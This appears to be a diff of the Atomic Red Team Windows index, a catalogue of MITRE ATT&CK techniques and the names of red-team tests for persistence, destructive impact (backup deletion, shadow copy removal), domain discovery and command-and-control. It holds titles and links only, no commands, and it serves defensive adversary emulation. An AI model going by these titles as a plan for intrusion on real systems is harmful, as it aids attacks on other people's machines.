- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
- Atomic Test #1: COM Hijacking - InprocServer32 [windows]
- Atomic Test #2: Powershell Execute COM Object [windows]
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- [T1136.002 Domain Account](../../T1136.002/T1136.002.md)
- Atomic Test #1: Create a new Windows domain admin user [windows]
- Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
- Atomic Test #3: Create a new Domain Account using PowerShell [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1133 External Remote Services](../../T1133/T1133.md)
- Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1062 Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.004 IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1062 Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- T1547.008 LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.008 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1136.001 Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #3: Create a new user in a command prompt [windows]
- Atomic Test #4: Create a new user in PowerShell [windows]
- Atomic Test #6: Create a new Windows admin user [windows]
- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md)
- Atomic Test #1: Logon Scripts [windows]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.007 Netsh Helper DLL](../../T1546.007/T1546.007.md)
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1137 Office Application Startup](../../T1137/T1137.md)
- Atomic Test #1: Office Application Startup - Outlook as a C2 [windows]
- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137 Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1137.002 Office Test](../../T1137.002/T1137.002.md)
- Atomic Test #1: Office Application Startup Test Persistence [windows]
- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1137.004 Outlook Home Page](../../T1137.004/T1137.004.md)
- Atomic Test #1: Install Outlook Home Page Persistence [windows]
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- T1034 Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- Atomic Test #1: Office Apllication Startup Test Persistence [windows]
- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.004 Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md)
- Atomic Test #1: Add Port Monitor persistence in Registry [windows]
- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
@@ -868,37 +501,30 @@
- Atomic Test #4: Suspicious vbs file run from startup Folder [windows]
- Atomic Test #5: Suspicious jse file run from startup Folder [windows]
- Atomic Test #6: Suspicious bat file run from startup Folder [windows]
- Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
- Atomic Test #8: Add persistance via Recycle bin [windows]
- Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- [T1547.005 Security Support Provider](../../T1547.005/T1547.005.md)
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md)
- Atomic Test #1: Shortcut Modification [windows]
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.003 Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1505.002 Transport Agent](../../T1505.002/T1505.002.md)
- Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1505.003 Web Shell](../../T1505.003/T1505.003.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
- [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
@@ -907,7 +533,6 @@
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
- Atomic Test #2: Service Installation CMD [windows]
- Atomic Test #3: Service Installation PowerShell [windows]
- Atomic Test #4: TinyTurla backdoor service w64time [windows]
- [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
@@ -918,56 +543,50 @@
- Atomic Test #1: Change User Password - Windows [windows]
- Atomic Test #2: Delete User - Windows [windows]
- Atomic Test #3: Remove Account From Domain Admin Group [windows]
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
- Atomic Test #3: Overwrite deleted data on C drive [windows]
- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
- Atomic Test #5: PureLocker Ransom Note [windows]
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1490 Inhibit System Recovery](../../T1490/T1490.md)
- Atomic Test #1: Windows - Delete Volume Shadow Copies [windows]
- Atomic Test #2: Windows - Delete Volume Shadow Copies via WMI [windows]
- Atomic Test #3: Windows - wbadmin Delete Windows Backup Catalog [windows]
- Atomic Test #3: Windows - Delete Windows Backup Catalog [windows]
- Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
- Atomic Test #6: Windows - Delete Backup Files [windows]
- Atomic Test #7: Windows - wbadmin Delete systemstatebackup [windows]
- Atomic Test #8: Windows - Disable the SR scheduled task [windows]
- Atomic Test #9: Disable System Restore Through Registry [windows]
- [T1491.001 Internal Defacement](../../T1491.001/T1491.001.md)
- Atomic Test #1: Replace Desktop Wallpaper [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1496 Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.001 Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1496 Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1489 Service Stop](../../T1489/T1489.md)
- Atomic Test #1: Windows - Stop service using Service Controller [windows]
- Atomic Test #2: Windows - Stop service using net.exe [windows]
- Atomic Test #3: Windows - Stop service by killing process [windows]
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #1: Shutdown System - Windows [windows]
- Atomic Test #2: Restart System - Windows [windows]
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# discovery
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087 Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1010 Application Window Discovery](../../T1010/T1010.md)
- Atomic Test #1: List Process Main Windows - C# .NET [windows]
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
- Atomic Test #4: List Google Chrome / Opera Bookmarks on Windows with powershell [windows]
- Atomic Test #4: List Google Chrome Bookmarks on Windows with powershell [windows]
- Atomic Test #5: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt [windows]
- Atomic Test #6: List Mozilla Firefox bookmarks on Windows with command prompt [windows]
- Atomic Test #7: List Internet Explorer Bookmarks using the command prompt [windows]
@@ -977,15 +596,6 @@
- Atomic Test #3: Enumerate logged on users via CMD (Domain) [windows]
- Atomic Test #4: Automated AD Recon (ADRecon) [windows]
- Atomic Test #5: Adfind -Listing password policy [windows]
- Atomic Test #6: Adfind - Enumerate Active Directory Admins [windows]
- Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows]
- Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
- Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
- Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
- Atomic Test #11: Get-DomainUser with PowerView [windows]
- Atomic Test #12: Enumerate Active Directory Users with ADSISearcher [windows]
- Atomic Test #13: Enumerate Linked Policies In ADSISearcher Discovery [windows]
- Atomic Test #14: Enumerate Root Domain linked policies Discovery [windows]
- [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
- Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
- Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -994,64 +604,39 @@
- Atomic Test #5: Find local admins on all machines in domain (PowerView) [windows]
- Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
- Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
- Atomic Test #8: Adfind - Query Active Directory Groups [windows]
- Atomic Test #9: Enumerate Active Directory Groups with Get-AdGroup [windows]
- Atomic Test #10: Enumerate Active Directory Groups with ADSISearcher [windows]
- Atomic Test #11: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
- Atomic Test #12: Get-DomainGroupMember with PowerView [windows]
- Atomic Test #13: Get-DomainGroup with PowerView [windows]
- [T1482 Domain Trust Discovery](../../T1482/T1482.md)
- Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
- Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
- Atomic Test #3: Powershell enumerate domains and forests [windows]
- Atomic Test #4: Adfind - Enumerate Active Directory OUs [windows]
- Atomic Test #5: Adfind - Enumerate Active Directory Trusts [windows]
- Atomic Test #6: Get-DomainTrust with PowerView [windows]
- Atomic Test #7: Get-ForestTrust with PowerView [windows]
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.003 Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #1: File and Directory Discovery (cmd.exe) [windows]
- Atomic Test #2: File and Directory Discovery (PowerShell) [windows]
- Atomic Test #5: Simulating MAZE Directory Enumeration [windows]
- [T1615 Group Policy Discovery](../../T1615/T1615.md)
- Atomic Test #1: Display group policy information via gpresult [windows]
- Atomic Test #2: Get-DomainGPO to display group policy information via PowerView [windows]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.001 Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
- Atomic Test #9: Enumerate all accounts via PowerShell (Local) [windows]
- Atomic Test #10: Enumerate logged on users via CMD (Local) [windows]
- Atomic Test #11: Enumerate logged on users via PowerShell [windows]
- [T1069.001 Local Groups](../../T1069.001/T1069.001.md)
- Atomic Test #2: Basic Permission Groups Discovery Windows (Local) [windows]
- Atomic Test #3: Permission Groups Discovery PowerShell (Local) [windows]
- Atomic Test #4: SharpHound3 - LocalAdmin [windows]
- Atomic Test #5: Wmic Group Discovery [windows]
- Atomic Test #6: WMIObject Group Discovery [windows]
- [T1046 Network Service Scanning](../../T1046/T1046.md)
- Atomic Test #3: Port Scan NMap for Windows [windows]
- Atomic Test #4: Port Scan using python [windows]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #3: Network Share Discovery command prompt [windows]
- Atomic Test #4: Network Share Discovery PowerShell [windows]
- Atomic Test #5: View available share drives [windows]
- Atomic Test #6: Share Discovery with PowerView [windows]
- Atomic Test #7: PowerView ShareFinder [windows]
- Atomic Test #2: Network Share Discovery command prompt [windows]
- Atomic Test #3: Network Share Discovery PowerShell [windows]
- Atomic Test #4: View available share drives [windows]
- Atomic Test #5: Share Discovery with PowerView [windows]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
- Atomic Test #4: Windows Internal Packet Capture [windows]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #5: Examine local password policy - Windows [windows]
- Atomic Test #6: Examine domain password policy - Windows [windows]
- Atomic Test #8: Get-DomainPolicy with PowerView [windows]
- Atomic Test #9: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy [windows]
- [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
- Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #2: Process Discovery - tasklist [windows]
- Atomic Test #3: Process Discovery - Get-Process [windows]
- Atomic Test #4: Process Discovery - get-wmiObject [windows]
- Atomic Test #5: Process Discovery - wmic process [windows]
- [T1012 Query Registry](../../T1012/T1012.md)
- Atomic Test #1: Query Registry [windows]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
@@ -1062,13 +647,6 @@
- Atomic Test #5: Remote System Discovery - arp [windows]
- Atomic Test #8: Remote System Discovery - nslookup [windows]
- Atomic Test #9: Remote System Discovery - adidnsdump [windows]
- Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows]
- Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows]
- Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
- Atomic Test #16: Enumerate Active Directory Computers with Get-AdComputer [windows]
- Atomic Test #17: Enumerate Active Directory Computers with ADSISearcher [windows]
- Atomic Test #18: Get-DomainController with PowerView [windows]
- Atomic Test #19: Get-wmiobject to Enumerate Domain Controllers [windows]
- [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #1: Security Software Discovery [windows]
- Atomic Test #2: Security Software Discovery - powershell [windows]
@@ -1079,67 +657,55 @@
- Atomic Test #2: Applications Installed [windows]
- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #4: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #1: System Information Discovery [windows]
- Atomic Test #6: Hostname Discovery (Windows) [windows]
- Atomic Test #8: Windows MachineGUID Discovery [windows]
- Atomic Test #9: Griffon Recon [windows]
- Atomic Test #10: Environment variables discovery on windows [windows]
- [T1614.001 System Language Discovery](../../T1614.001/T1614.001.md)
- Atomic Test #1: Discover System Language by Registry Query [windows]
- Atomic Test #2: Discover System Language with chcp [windows]
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
- Atomic Test #1: System Network Configuration Discovery on Windows [windows]
- Atomic Test #2: List Windows Firewall Rules [windows]
- Atomic Test #4: System Network Configuration Discovery (TrickBot Style) [windows]
- Atomic Test #5: List Open Egress Ports [windows]
- Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects [windows]
- Atomic Test #7: Qakbot Recon [windows]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #1: System Network Connections Discovery [windows]
- Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
- Atomic Test #4: System Discovery using SharpView [windows]
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #1: System Owner/User Discovery [windows]
- Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
- Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
- Atomic Test #5: GetCurrent User with PowerShell Script [windows]
- [T1007 System Service Discovery](../../T1007/T1007.md)
- Atomic Test #1: System Service Discovery [windows]
- Atomic Test #2: System Service Discovery - net.exe [windows]
- [T1124 System Time Discovery](../../T1124/T1124.md)
- Atomic Test #1: System Time Discovery [windows]
- Atomic Test #2: System Time Discovery - PowerShell [windows]
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# command-and-control
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1071.004 DNS](../../T1071.004/T1071.004.md)
- Atomic Test #1: DNS Large Query Volume [windows]
- Atomic Test #2: DNS Regular Beaconing [windows]
- Atomic Test #3: DNS Long Domain Query [windows]
- Atomic Test #4: DNS C2 [windows]
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
